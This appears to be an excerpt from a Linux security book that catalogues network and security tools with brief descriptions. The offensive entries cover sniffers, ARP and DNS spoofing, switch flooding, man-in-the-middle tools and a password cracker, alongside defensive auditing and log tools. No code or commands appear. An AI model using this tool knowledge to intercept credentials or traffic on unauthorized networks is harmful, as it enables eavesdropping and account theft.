Hacker Linux Uncovered

hunt ( lin.fsid.cvut.cz/~kra/index.html ) This is one of the popular sniffer programs. It also has built-in functions to send fake ARP packets to fake MAC addresses and to intercept connections.

dsniff ( monkey .org/~dugsong/dsniff/ ) This is a utility package for traffic monitoring and related tasks . It comprises the following utilities:

• dsniff Intercepts passwords (the main utility). The utility monitors the network for authorization packets. When it detects such a packet, the utility extracts and displays the password. Authorization packets for all of the main protocols Telnet, FTP, POP, etc. are supported.

• arpspoof Sends ARP reply packets to fake IP addresses.

• dnsspoof Sends fake DNS packets. If the target machine requests that a host name be resolved to its IP address, you can switch the reply from the DNS server to make the target connect to your computer instead of the requested host.

• filesnaf Monitors traffic, waiting for NFS file transfers.

• mailsnaf Monitors traffic, waiting for POP and SMTP mail messages.

• msgsnaf Monitors Internet pager and chat messages, such as ICQ and IRC.

• macof Floods a switch with packets with generated MAC addresses. If the switch fails to handle the route-resolution workload, it starts functioning as a simple hub, replicating the incoming traffic to all outgoing ports.

• tcpkill Terminates a third-party connection by sending an RST packet.

• webspy Monitors Web connections and creates a list of sites visited by a specific user .

• webmint Emulates a Web server to carry out a man-in-the-middle attack (see Section 7.9 ).

ettercap ( ettercap. sourceforge .net ) In my opinion, this is the most convenient traffic-monitoring program. Its main function is to look for passwords in packets of all popular protocols. Administrators will also appreciate the function to detect other sniffing programs.

LSAT ( usat.sourceforge.net/ ) This utility is used to check the system configuration ( considered in Section 12.3 ). It analyzes the server's configuration, displaying potential faults, and in some cases can give recommendations on how to fix them.

Bastille ( bastille-linux.sourceforge.net/ ) This utility detects potential server-configuration errors. It can automatically correct configuration errors and faults.

Klaxon ( www.eng.auburn.edu/users/doug/second.html ) This is an attack-detection utility (see Section 12.4 ).

PortSentry ( sourceforge.net/projects/sentrytools ) This utility monitors ports for port-scanning activities (see Section 12.4 ). It can automatically configure the firewall to prohibit connections with the computer, from which port scanning was detected .

Swatch ( sourceforge.net/projects/swatch ) This is a handy program for analyzing system logs on a schedule (see Section 12.6 ).

Logsurfer ( sourceforge.net/projects/logsurfer ) This is one of the few utilities that can analyze security logs dynamically (see Section 12.6 ).

John the Ripper ( www.openwall.com/john/ ) This is the most famous password-cracking program.

POP-before-SMTP ( popbsmtp.sourceforge.net/ ) This service allows email to be sent only if the user first checks the POP3 mailbox.

nmap ( www. insecure .org/nmap/ ) This is a port scanner with numerous features.